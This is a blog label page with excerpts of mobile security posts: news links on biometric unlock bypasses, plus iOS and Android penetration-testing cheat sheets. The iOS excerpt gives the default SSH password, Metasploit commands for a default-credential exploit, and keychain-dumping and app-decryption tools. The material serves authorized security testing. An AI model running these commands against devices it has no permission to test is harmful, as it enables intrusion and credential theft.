Posts

Showing posts with the label Mobile

Authentication Bypass - Mobile

18 Apr 2019: Nokia 9 buggy update lets anyone bypass fingerprint scanner with a pack of gum https://twitter.com/decodedpixel/status/1120069664170807296 7 Mar 2019: Samsung Galaxy S10 Face Recognition Can Easily Be Bypassed https://twitter.com/JulianChokkattu/status/1103689733576773635

Mobile Penetration Testing - iOS

Image
Connect to iDevice using SSH or WinSCP Default password is alpine Checking default password for OpenSSH msfconsole msf > use exploit/apple_ios/ssh/cydia_default_ssh msf > show options msf > set RHOST 10.9.8.84 msf > exploit To obtain IPA file from installed Apps ./Clutch-2.0.4 -i ./Clutch-2.0.4 -d <id> To check the location of Apps ipainstaller -i <identifier> otool -l -v <Application> | grep stack Insecure Data Storage Keychain Dumper ./keychain_dumper > output.txt MobSF python manage.py server

Mobile Penetration Testing - Android

Image
Testing Environment Android Emulator Geny Motion: https://www.genymotion.com/fun-zone/ Android Debug Bridge (ADB) C:\Users\<User>\AppData\Local\Android\Sdk\platform-tools adb -s <specific device> shell #Specific Device adb -d shell #Device adb -e shell #Emulator Basic ADB command adb install <apk file> adb pull <location> adb push <file> <location> Basic Linux command cat /proc/version #Kernel version cat /proc/cpuinfo #Processor Information ps #Processes cat /system/etc/permissions/platform.xml #Permission and GID Information Gathering Retrieve APK file from Device (Recommended) adb shell pm list packages pm path <package> adb pull <apk path> Retrieve APK file from Internet https://apkpure.com To check the certificate information keytool -printcert -file CERT.RSA #C:\Program Files\Java\jre1.8.0_131\bin\keytool.exe Android Manifest Analysis 1. Activity, Service, Content Provider, Broadcast ...

Popular posts from this blog

Remote Desktop Protocol (RDP) Security

Penetration Testing - Network

Damn Vulnerable Web Services (DVWS) - Walkthrough

Server Message Block (SMB) Security

Offensive Security Testing Guide

Host Configuration Assessment - Windows

Web Server Hardening - Apache Tomcat

Content Page

Mobile Penetration Testing - Android

Penetration Testing with OWASP Top 10 - 2017 A7 Cross-Site Scripting (XSS)